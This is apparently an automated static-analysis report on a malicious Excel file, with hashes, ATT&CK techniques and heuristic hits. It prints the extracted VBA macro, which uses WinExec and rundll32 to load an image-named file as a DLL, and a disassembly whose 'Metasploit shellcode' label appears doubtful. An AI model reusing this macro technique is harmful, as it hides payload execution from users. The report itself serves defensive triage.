Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 603c2850f54b66e2…

MALICIOUS

Office (OLE)

Size: 415.5 KB
Created: 2006-09-12 15:06:44
Authoring application: Microsoft Excel
First seen: 2019-04-18
MD5: 68d719cc5a931d50cc3ab26d68ef480a
SHA-1: b135482ae88d0a0fc90016a83a8d0ca9f957bf77
SHA-256: 603c2850f54b66e25636a222c3fa2b01f387e590f40d705e6a71ace7cc752aae
Risk score: 420

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.011 System Binary Proxy Execution: Rundll32
  • T1105 Ingress Tool Transfer

The VBA macro in this Excel file calls WinExec to run rundll32.exe against C:\Users\MASTER\Desktop\DLL\D.png, a file with a benign-looking image extension that is loaded as a DLL (export "EntryPoint") and likely contains a second-stage payload. The embedded PE executable and Metasploit reverse_tcp shellcode detected in the sample further indicate downloader or dropper functionality.

Heuristics (10)

  • ClamAV: Doc.Downloader.Jrat-6336393-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jrat-6336393-1
  • Metasploit reverse_tcp shellcode critical SC_MSF_REVERSE
    Metasploit reverse_tcp shellcode
    Disassembly
    Attempted x86 opcode disassembly
    000431AF  fc                cld
    000431B0  e882000000        call 0x43237
    000431B5  5f                pop edi
    000431B6  5e                pop esi
    000431B7  5b                pop ebx
    000431B8  8be5              mov esp, ebp
    000431BA  5d                pop ebp
    000431BB  c3                ret
    000431BC  8d4000            lea eax, [eax]
    000431BF  53                push ebx
    000431C0  56                push esi
    000431C1  8bd8              mov ebx, eax
    000431C3  3b5324            cmp edx, dword ptr [ebx + 0x24]
    000431C6  7436              je 0x431fe
    000431C8  8bf2              mov esi, edx
    000431CA  85f6              test esi, esi
    000431CC  7518              jne 0x431e6
    000431CE  33c0              xor eax, eax
    000431D0  8a4318            mov al, byte ptr [ebx + 0x18]
    000431D3  8b0485ccdb4400    mov eax, dword ptr [eax*4 + 0x44dbcc]
    000431DA  50                push eax
    000431DB  a178de4400        mov eax, dword ptr [0x44de78]
    000431E0  8b00              mov eax, dword ptr [eax]
    000431E2  ffd0              call eax
    000431E4  8bd0              mov edx, eax
    000431E6  895324            mov dword ptr [ebx + 0x24], edx
    000431E9  c6434401          mov byte ptr [ebx + 0x44], 1
    000431ED  8b4304            mov eax, dword ptr [ebx + 4]
    000431F0  e8ba060000        call 0x438af
    000431F5  85f6              test esi, esi
    000431F7  7505              jne 0x431fe
    000431F9  33c0              xor eax, eax
    000431FB  894324            mov dword ptr [ebx + 0x24], eax
    000431FE  5e                pop esi
    000431FF  5b                pop ebx
    00043200  c3                ret
    00043201  8bc0              mov eax, eax
    00043203  3b5028            cmp edx, dword ptr [eax + 0x28]
    00043206  7413              je 0x4321b
    00043208  895028            mov dword ptr [eax + 0x28], edx
    0004320B  c6402c00          mov byte ptr [eax + 0x2c], 0
  • Embedded PE executable critical OLE_EMBEDDED_EXE
    MZ/PE header found inside document — possible embedded executable
  • VBA macros detected medium (1 related finding) OLE_VBA_MACROS
    Document contains VBA macro code
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Sub Objet1_Clic()
    WinExec "C:\Windows\SysWOW64\rundll32.exe" + Space(1) + "C:\Users\MASTER\Desktop\DLL\D.png" + "," + Space(1) + "EntryPoint", 1
    End Sub
  • Reference to WinExec API high SC_STR_WINEXEC
    Reference to WinExec API
  • Reference to LoadLibrary API high SC_STR_LOADLIBRARY
    Reference to LoadLibrary API
  • Reference to GetProcAddress API high SC_STR_GETPROCADDRESS
    Reference to GetProcAddress API
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (3)

Files carved from inside the sample during analysis, listed with filename, kind, source and size.
Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1522 bytes
SHA-256: 4b993d8b6fcfae5d2b432c91783ad1f4ce1d685f51d6d954769a90df8b62ed06
Script preview: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function WinExec Lib "kernel32.dll" ( _
     ByVal lpCmdLine As String, _
     ByVal nCmdShow As Long) As Long ' WinExecu to run command
Sub Objet1_Clic()
WinExec "C:\Windows\SysWOW64\rundll32.exe" + Space(1) + "C:\Users\MASTER\Desktop\DLL\D.png" + "," + Space(1) + "EntryPoint", 1
End Sub



Attribute VB_Name = "Feuil2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Feuil3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: embedded_office_00001667.exe
Kind: embedded-pe
Source: Office MZ+PE at offset 0x1667
Size: 419737 bytes
SHA-256: 5dfcaeda607ecc7fc358d35ba8525f2dda828492af8fe120a18907675d97319b
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_MSF_REVERSE, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY.
Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess.
Filename: ole10native_00.bin
Kind: ole-package
Source: OLE Ole10Native stream: MBD00053CDD/Ole10Native
Size: 366359 bytes
SHA-256: d14eab0b19645df306c5c3c2504877c7ba0af674390070694191f5ecf41f3eab
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis found candidate code region(s). Indicators: SC_MSF_REVERSE, SC_STR_VIRTUALALLOC, SC_STR_LOADLIBRARY.
Static shellcode analysis recovered API/import strings: LoadLibraryExA, VirtualAlloc, GetProcAddress, ExitProcess.